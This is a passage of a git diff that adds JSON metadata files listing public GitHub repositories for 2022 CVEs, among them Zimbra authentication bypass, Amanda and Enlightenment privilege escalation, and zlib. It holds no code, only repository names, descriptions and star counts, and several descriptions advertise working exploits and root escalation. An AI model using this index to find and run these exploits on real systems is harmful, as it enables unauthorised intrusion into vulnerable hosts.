"topics": [], + "visibility": "public", + "forks": 0, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-37042.json b/2022/CVE-2022-37042.json new file mode 100644 index 0000000000..5e5ec0957f --- /dev/null +++ b/2022/CVE-2022-37042.json @@ -0,0 +1,95 @@ +[ + { + "id": 526332797, + "name": "Zimbra_CVE-2022-37042-_CVE-2022-27925", + "full_name": "GreyNoise-Intelligence\/Zimbra_CVE-2022-37042-_CVE-2022-27925", + "owner": { + "login": "GreyNoise-Intelligence", + "id": 32075718, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/32075718?v=4", + "html_url": "https:\/\/github.com\/GreyNoise-Intelligence", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/GreyNoise-Intelligence\/Zimbra_CVE-2022-37042-_CVE-2022-27925", + "description": null, + "fork": false, + "created_at": "2022-08-18T18:39:39Z", + "updated_at": "2022-08-30T09:13:19Z", + "pushed_at": "2022-08-18T18:41:13Z", + "stargazers_count": 6, + "watchers_count": 6, + "has_discussions": false, + "forks_count": 6, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 6, + "watchers": 6, + "score": 0, + "subscribers_count": 13 + }, + { + "id": 528805450, + "name": "CVE-2022-37042", + "full_name": "aels\/CVE-2022-37042", + "owner": { + "login": "aels", + "id": 1212294, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1212294?v=4", + "html_url": "https:\/\/github.com\/aels", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/aels\/CVE-2022-37042", + "description": "Zimbra CVE-2022-37042 Nuclei weaponized template", + "fork": false, + "created_at": "2022-08-25T10:43:13Z", + "updated_at": "2024-11-02T03:18:30Z", + "pushed_at": "2022-08-29T16:56:10Z", + "stargazers_count": 19, + "watchers_count": 19, + "has_discussions": false, + "forks_count": 12, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 12, + "watchers": 19, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 556684444, + "name": "CVE-2022-37042", + "full_name": "0xf4n9x\/CVE-2022-37042", + "owner": { + "login": "0xf4n9x", + "id": 40891670, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/40891670?v=4", + "html_url": "https:\/\/github.com\/0xf4n9x", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/0xf4n9x\/CVE-2022-37042", + "description": "CVE-2022-37042 Zimbra Auth Bypass leads to RCE", + "fork": false, + "created_at": "2022-10-24T10:10:45Z", + "updated_at": "2024-11-16T19:51:23Z", + "pushed_at": "2022-12-09T02:45:14Z", + "stargazers_count": 30, + "watchers_count": 30, + "has_discussions": false, + "forks_count": 8, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 8, + "watchers": 30, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-37177.json b/2022/CVE-2022-37177.json new file mode 100644 index 0000000000..f59fef325e --- /dev/null +++ b/2022/CVE-2022-37177.json @@ -0,0 +1,33 @@ +[ + { + "id": 529616558, + "name": "CVE-2022-37177", + "full_name": "JC175\/CVE-2022-37177", + "owner": { + "login": "JC175", + "id": 33234808, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/33234808?v=4", + "html_url": "https:\/\/github.com\/JC175", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/JC175\/CVE-2022-37177", + "description": "CVE-2022-37177 - HireVue-Broken-Or-Risky-Cryptographic-Algorithm", + "fork": false, + "created_at": "2022-08-27T15:00:23Z", + "updated_at": "2022-08-28T14:42:50Z", + "pushed_at": "2022-08-27T16:38:45Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-37201.json b/2022/CVE-2022-37201.json new file mode 100644 index 0000000000..a4278c17b5 --- /dev/null +++ b/2022/CVE-2022-37201.json @@ -0,0 +1,33 @@ +[ + { + "id": 536951837, + "name": "CVE-2022-37201", + "full_name": "AgainstTheLight\/CVE-2022-37201", + "owner": { + "login": "AgainstTheLight", + "id": 108649390, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/108649390?v=4", + "html_url": "https:\/\/github.com\/AgainstTheLight", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/AgainstTheLight\/CVE-2022-37201", + "description": "CVE-2022-37201 POC", + "fork": false, + "created_at": "2022-09-15T09:21:30Z", + "updated_at": "2022-09-15T09:21:30Z", + "pushed_at": "2022-09-15T09:23:57Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-37202.json b/2022/CVE-2022-37202.json new file mode 100644 index 0000000000..3d93092227 --- /dev/null +++ b/2022/CVE-2022-37202.json @@ -0,0 +1,33 @@ +[ + { + "id": 536954849, + "name": "CVE-2022-37202", + "full_name": "AgainstTheLight\/CVE-2022-37202", + "owner": { + "login": "AgainstTheLight", + "id": 108649390, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/108649390?v=4", + "html_url": "https:\/\/github.com\/AgainstTheLight", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/AgainstTheLight\/CVE-2022-37202", + "description": "CVE-2022-37202 POC", + "fork": false, + "created_at": "2022-09-15T09:29:39Z", + "updated_at": "2022-09-15T09:29:39Z", + "pushed_at": "2022-09-15T09:31:26Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-37203.json b/2022/CVE-2022-37203.json new file mode 100644 index 0000000000..50377c3df3 --- /dev/null +++ b/2022/CVE-2022-37203.json @@ -0,0 +1,33 @@ +[ + { + "id": 536958064, + "name": "CVE-2022-37203", + "full_name": "AgainstTheLight\/CVE-2022-37203", + "owner": { + "login": "AgainstTheLight", + "id": 108649390, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/108649390?v=4", + "html_url": "https:\/\/github.com\/AgainstTheLight", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/AgainstTheLight\/CVE-2022-37203", + "description": "CVE-2022-37203 POC", + "fork": false, + "created_at": "2022-09-15T09:38:52Z", + "updated_at": "2022-09-15T09:38:52Z", + "pushed_at": "2022-09-15T09:40:10Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-37204.json b/2022/CVE-2022-37204.json new file mode 100644 index 0000000000..52002a8421 --- /dev/null +++ b/2022/CVE-2022-37204.json @@ -0,0 +1,33 @@ +[ + { + "id": 536959702, + "name": "CVE-2022-37204", + "full_name": "AgainstTheLight\/CVE-2022-37204", + "owner": { + "login": "AgainstTheLight", + "id": 108649390, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/108649390?v=4", + "html_url": "https:\/\/github.com\/AgainstTheLight", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/AgainstTheLight\/CVE-2022-37204", + "description": "CVE-2022-37204 POC", + "fork": false, + "created_at": "2022-09-15T09:43:39Z", + "updated_at": "2022-09-15T09:43:39Z", + "pushed_at": "2022-09-15T09:44:28Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-37205.json b/2022/CVE-2022-37205.json new file mode 100644 index 0000000000..66d4f88be5 --- /dev/null +++ b/2022/CVE-2022-37205.json @@ -0,0 +1,33 @@ +[ + { + "id": 536960585, + "name": "CVE-2022-37205", + "full_name": "AgainstTheLight\/CVE-2022-37205", + "owner": { + "login": "AgainstTheLight", + "id": 108649390, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/108649390?v=4", + "html_url": "https:\/\/github.com\/AgainstTheLight", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/AgainstTheLight\/CVE-2022-37205", + "description": "CVE-2022-37205 POC", + "fork": false, + "created_at": "2022-09-15T09:46:06Z", + "updated_at": "2022-09-15T09:46:06Z", + "pushed_at": "2022-09-15T09:46:59Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-37206.json b/2022/CVE-2022-37206.json new file mode 100644 index 0000000000..13429a9ae7 --- /dev/null +++ b/2022/CVE-2022-37206.json @@ -0,0 +1,33 @@ +[ + { + "id": 536961405, + "name": "CVE-2022-37206", + "full_name": "AgainstTheLight\/CVE-2022-37206", + "owner": { + "login": "AgainstTheLight", + "id": 108649390, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/108649390?v=4", + "html_url": "https:\/\/github.com\/AgainstTheLight", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/AgainstTheLight\/CVE-2022-37206", + "description": "CVE-2022-37206 POC", + "fork": false, + "created_at": "2022-09-15T09:48:18Z", + "updated_at": "2022-09-15T09:48:18Z", + "pushed_at": "2022-09-15T09:49:03Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-37207.json b/2022/CVE-2022-37207.json new file mode 100644 index 0000000000..3915774aa1 --- /dev/null +++ b/2022/CVE-2022-37207.json @@ -0,0 +1,33 @@ +[ + { + "id": 536963041, + "name": "CVE-2022-37207", + "full_name": "AgainstTheLight\/CVE-2022-37207", + "owner": { + "login": "AgainstTheLight", + "id": 108649390, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/108649390?v=4", + "html_url": "https:\/\/github.com\/AgainstTheLight", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/AgainstTheLight\/CVE-2022-37207", + "description": "CVE-2022-37207 POC", + "fork": false, + "created_at": "2022-09-15T09:53:06Z", + "updated_at": "2022-09-15T09:53:06Z", + "pushed_at": "2022-09-15T09:54:19Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-37208.json b/2022/CVE-2022-37208.json new file mode 100644 index 0000000000..4ed49fd14b --- /dev/null +++ b/2022/CVE-2022-37208.json @@ -0,0 +1,33 @@ +[ + { + "id": 536963955, + "name": "CVE-2022-37208", + "full_name": "AgainstTheLight\/CVE-2022-37208", + "owner": { + "login": "AgainstTheLight", + "id": 108649390, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/108649390?v=4", + "html_url": "https:\/\/github.com\/AgainstTheLight", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/AgainstTheLight\/CVE-2022-37208", + "description": "CVE-2022-37208", + "fork": false, + "created_at": "2022-09-15T09:55:49Z", + "updated_at": "2022-09-15T09:57:01Z", + "pushed_at": "2022-09-15T09:56:22Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-37209.json b/2022/CVE-2022-37209.json new file mode 100644 index 0000000000..9a7228d0d5 --- /dev/null +++ b/2022/CVE-2022-37209.json @@ -0,0 +1,33 @@ +[ + { + "id": 537366751, + "name": "CVE-2022-37209", + "full_name": "AgainstTheLight\/CVE-2022-37209", + "owner": { + "login": "AgainstTheLight", + "id": 108649390, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/108649390?v=4", + "html_url": "https:\/\/github.com\/AgainstTheLight", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/AgainstTheLight\/CVE-2022-37209", + "description": "CVE-2022-37209 POC", + "fork": false, + "created_at": "2022-09-16T08:15:13Z", + "updated_at": "2022-09-17T07:33:02Z", + "pushed_at": "2022-09-16T08:16:00Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-37210.json b/2022/CVE-2022-37210.json new file mode 100644 index 0000000000..8a8c0d0e8a --- /dev/null +++ b/2022/CVE-2022-37210.json @@ -0,0 +1,33 @@ +[ + { + "id": 537367651, + "name": "CVE-2022-37210", + "full_name": "AgainstTheLight\/CVE-2022-37210", + "owner": { + "login": "AgainstTheLight", + "id": 108649390, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/108649390?v=4", + "html_url": "https:\/\/github.com\/AgainstTheLight", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/AgainstTheLight\/CVE-2022-37210", + "description": "CVE-2022-37210 POC", + "fork": false, + "created_at": "2022-09-16T08:17:56Z", + "updated_at": "2022-09-17T07:32:55Z", + "pushed_at": "2022-09-16T08:18:34Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-37298.json b/2022/CVE-2022-37298.json new file mode 100644 index 0000000000..80f98c5c65 --- /dev/null +++ b/2022/CVE-2022-37298.json @@ -0,0 +1,33 @@ +[ + { + "id": 551104266, + "name": "cve-2022-37298", + "full_name": "dbyio\/cve-2022-37298", + "owner": { + "login": "dbyio", + "id": 12803470, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/12803470?v=4", + "html_url": "https:\/\/github.com\/dbyio", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/dbyio\/cve-2022-37298", + "description": "CVE-2022-37298 Shinken Monitoring", + "fork": false, + "created_at": "2022-10-13T21:07:02Z", + "updated_at": "2023-06-19T08:26:27Z", + "pushed_at": "2022-11-02T20:36:27Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-37332.json b/2022/CVE-2022-37332.json new file mode 100644 index 0000000000..548fb897dc --- /dev/null +++ b/2022/CVE-2022-37332.json @@ -0,0 +1,33 @@ +[ + { + "id": 590713271, + "name": "CVE-2022-37332-RCE-", + "full_name": "SpiralBL0CK\/CVE-2022-37332-RCE-", + "owner": { + "login": "SpiralBL0CK", + "id": 25670930, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/25670930?v=4", + "html_url": "https:\/\/github.com\/SpiralBL0CK", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/SpiralBL0CK\/CVE-2022-37332-RCE-", + "description": "CURRENTLY UNDER WORK... ALL I NEED TO IMPLEMENT IS JIT SPRAYING ..... ", + "fork": false, + "created_at": "2023-01-19T02:41:54Z", + "updated_at": "2023-01-19T02:43:59Z", + "pushed_at": "2023-01-19T03:11:07Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-37434.json b/2022/CVE-2022-37434.json new file mode 100644 index 0000000000..5a6ee11145 --- /dev/null +++ b/2022/CVE-2022-37434.json @@ -0,0 +1,95 @@ +[ + { + "id": 551717222, + "name": "CVE-2022-37434_poc", + "full_name": "xen0bit\/CVE-2022-37434_poc", + "owner": { + "login": "xen0bit", + "id": 21974988, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/21974988?v=4", + "html_url": "https:\/\/github.com\/xen0bit", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/xen0bit\/CVE-2022-37434_poc", + "description": "u think that it doesnt but it do", + "fork": false, + "created_at": "2022-10-15T00:29:38Z", + "updated_at": "2024-10-29T11:15:07Z", + "pushed_at": "2022-10-15T00:46:03Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 751714869, + "name": "external_zlib_android-6.0.1_r22_CVE-2022-37434", + "full_name": "Trinadh465\/external_zlib_android-6.0.1_r22_CVE-2022-37434", + "owner": { + "login": "Trinadh465", + "id": 102574296, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102574296?v=4", + "html_url": "https:\/\/github.com\/Trinadh465", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Trinadh465\/external_zlib_android-6.0.1_r22_CVE-2022-37434", + "description": null, + "fork": false, + "created_at": "2024-02-02T06:57:18Z", + "updated_at": "2024-02-02T06:57:18Z", + "pushed_at": "2024-02-02T06:57:18Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 751878497, + "name": "external_zlib_CVE-2022-37434", + "full_name": "Trinadh465\/external_zlib_CVE-2022-37434", + "owner": { + "login": "Trinadh465", + "id": 102574296, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102574296?v=4", + "html_url": "https:\/\/github.com\/Trinadh465", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Trinadh465\/external_zlib_CVE-2022-37434", + "description": null, + "fork": false, + "created_at": "2024-02-02T14:25:28Z", + "updated_at": "2024-02-02T14:29:25Z", + "pushed_at": "2024-02-02T14:29:54Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-37703.json b/2022/CVE-2022-37703.json new file mode 100644 index 0000000000..ef120611e0 --- /dev/null +++ b/2022/CVE-2022-37703.json @@ -0,0 +1,33 @@ +[ + { + "id": 536278901, + "name": "CVE-2022-37703", + "full_name": "MaherAzzouzi\/CVE-2022-37703", + "owner": { + "login": "MaherAzzouzi", + "id": 62230190, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/62230190?v=4", + "html_url": "https:\/\/github.com\/MaherAzzouzi", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/MaherAzzouzi\/CVE-2022-37703", + "description": "Amanda Information Disclosure bug.", + "fork": false, + "created_at": "2022-09-13T19:26:38Z", + "updated_at": "2023-03-28T02:55:32Z", + "pushed_at": "2022-09-13T19:29:03Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 3, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-37704.json b/2022/CVE-2022-37704.json new file mode 100644 index 0000000000..3b0d7a9f39 --- /dev/null +++ b/2022/CVE-2022-37704.json @@ -0,0 +1,33 @@ +[ + { + "id": 556237054, + "name": "CVE-2022-37704", + "full_name": "MaherAzzouzi\/CVE-2022-37704", + "owner": { + "login": "MaherAzzouzi", + "id": 62230190, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/62230190?v=4", + "html_url": "https:\/\/github.com\/MaherAzzouzi", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/MaherAzzouzi\/CVE-2022-37704", + "description": "Amanda 3.5.1 LPE", + "fork": false, + "created_at": "2022-10-23T11:43:49Z", + "updated_at": "2023-02-22T11:07:22Z", + "pushed_at": "2022-10-23T11:45:14Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 3, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-37705.json b/2022/CVE-2022-37705.json new file mode 100644 index 0000000000..3808394ad3 --- /dev/null +++ b/2022/CVE-2022-37705.json @@ -0,0 +1,33 @@ +[ + { + "id": 556238627, + "name": "CVE-2022-37705", + "full_name": "MaherAzzouzi\/CVE-2022-37705", + "owner": { + "login": "MaherAzzouzi", + "id": 62230190, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/62230190?v=4", + "html_url": "https:\/\/github.com\/MaherAzzouzi", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/MaherAzzouzi\/CVE-2022-37705", + "description": "Amanda 3.5.1 second LPE.", + "fork": false, + "created_at": "2022-10-23T11:48:36Z", + "updated_at": "2022-10-24T02:18:52Z", + "pushed_at": "2022-10-23T11:49:48Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 3, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-37706.json b/2022/CVE-2022-37706.json new file mode 100644 index 0000000000..703a394475 --- /dev/null +++ b/2022/CVE-2022-37706.json @@ -0,0 +1,219 @@ +[ + { + "id": 535818195, + "name": "CVE-2022-37706-LPE-exploit", + "full_name": "MaherAzzouzi\/CVE-2022-37706-LPE-exploit", + "owner": { + "login": "MaherAzzouzi", + "id": 62230190, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/62230190?v=4", + "html_url": "https:\/\/github.com\/MaherAzzouzi", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/MaherAzzouzi\/CVE-2022-37706-LPE-exploit", + "description": "A reliable exploit + write-up to elevate privileges to root. (Tested on Ubuntu 22.04)", + "fork": false, + "created_at": "2022-09-12T19:22:44Z", + "updated_at": "2025-01-01T20:36:51Z", + "pushed_at": "2022-09-19T19:41:34Z", + "stargazers_count": 303, + "watchers_count": 303, + "has_discussions": false, + "forks_count": 42, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 42, + "watchers": 303, + "score": 0, + "subscribers_count": 6 + }, + { + "id": 538041124, + "name": "CVE-2022-37706", + "full_name": "ECU-10525611-Xander\/CVE-2022-37706", + "owner": { + "login": "ECU-10525611-Xander", + "id": 79676080, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/79676080?v=4", + "html_url": "https:\/\/github.com\/ECU-10525611-Xander", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ECU-10525611-Xander\/CVE-2022-37706", + "description": "All Credit to MaherAzzouzi (https:\/\/github.com\/MaherAzzouzi\/CVE-2022-37706-LPE-exploit). This is a copy of the exploit for CTFs", + "fork": false, + "created_at": "2022-09-18T08:04:08Z", + "updated_at": "2022-09-19T00:37:23Z", + "pushed_at": "2022-09-18T08:15:06Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 809545292, + "name": "CVE-2022-37706", + "full_name": "junnythemarksman\/CVE-2022-37706", + "owner": { + "login": "junnythemarksman", + "id": 20056452, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/20056452?v=4", + "html_url": "https:\/\/github.com\/junnythemarksman", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/junnythemarksman\/CVE-2022-37706", + "description": "Exploit created by nu11secur1ty (https:\/\/github.com\/nu11secur1ty\/CVE-mitre\/tree\/main\/CVE-2022-37706)", + "fork": false, + "created_at": "2024-06-03T01:17:04Z", + "updated_at": "2024-06-03T01:30:01Z", + "pushed_at": "2024-06-03T01:29:57Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 831203901, + "name": "CVE-2022-37706-SUID", + "full_name": "TACTICAL-HACK\/CVE-2022-37706-SUID", + "owner": { + "login": "TACTICAL-HACK", + "id": 120341635, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/120341635?v=4", + "html_url": "https:\/\/github.com\/TACTICAL-HACK", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/TACTICAL-HACK\/CVE-2022-37706-SUID", + "description": "CVE-2022-37706-Enlightenment v0.25.3 - Privilege escalation", + "fork": false, + "created_at": "2024-07-19T23:12:40Z", + "updated_at": "2024-07-20T15:53:52Z", + "pushed_at": "2024-07-20T15:53:49Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 844104873, + "name": "CVE-2022-37706", + "full_name": "sanan2004\/CVE-2022-37706", + "owner": { + "login": "sanan2004", + "id": 118365296, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/118365296?v=4", + "html_url": "https:\/\/github.com\/sanan2004", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sanan2004\/CVE-2022-37706", + "description": "PoC", + "fork": false, + "created_at": "2024-08-18T11:57:58Z", + "updated_at": "2024-08-21T10:03:16Z", + "pushed_at": "2024-08-18T11:59:23Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 855131874, + "name": "CVE-2022-37706", + "full_name": "KaoXx\/CVE-2022-37706", + "owner": { + "login": "KaoXx", + "id": 63966704, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/63966704?v=4", + "html_url": "https:\/\/github.com\/KaoXx", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/KaoXx\/CVE-2022-37706", + "description": null, + "fork": false, + "created_at": "2024-09-10T11:14:10Z", + "updated_at": "2024-09-10T11:19:23Z", + "pushed_at": "2024-09-10T11:18:49Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 901320773, + "name": "CVE-2022-37706", + "full_name": "d3ndr1t30x\/CVE-2022-37706", + "owner": { + "login": "d3ndr1t30x", + "id": 117501042, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/117501042?v=4", + "html_url": "https:\/\/github.com\/d3ndr1t30x", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/d3ndr1t30x\/CVE-2022-37706", + "description": "Privilege escaltion exploit script for Boardlight machine on HackTheBox. I had access as the Larissa user and ran this script from the \/tmp directory; script has been adjusted accordingly.", + "fork": false, + "created_at": "2024-12-10T12:52:29Z", + "updated_at": "2024-12-10T13:06:30Z", + "pushed_at": "2024-12-10T13:06:26Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-37708.json b/2022/CVE-2022-37708.json new file mode 100644 index 0000000000..0ae116e481 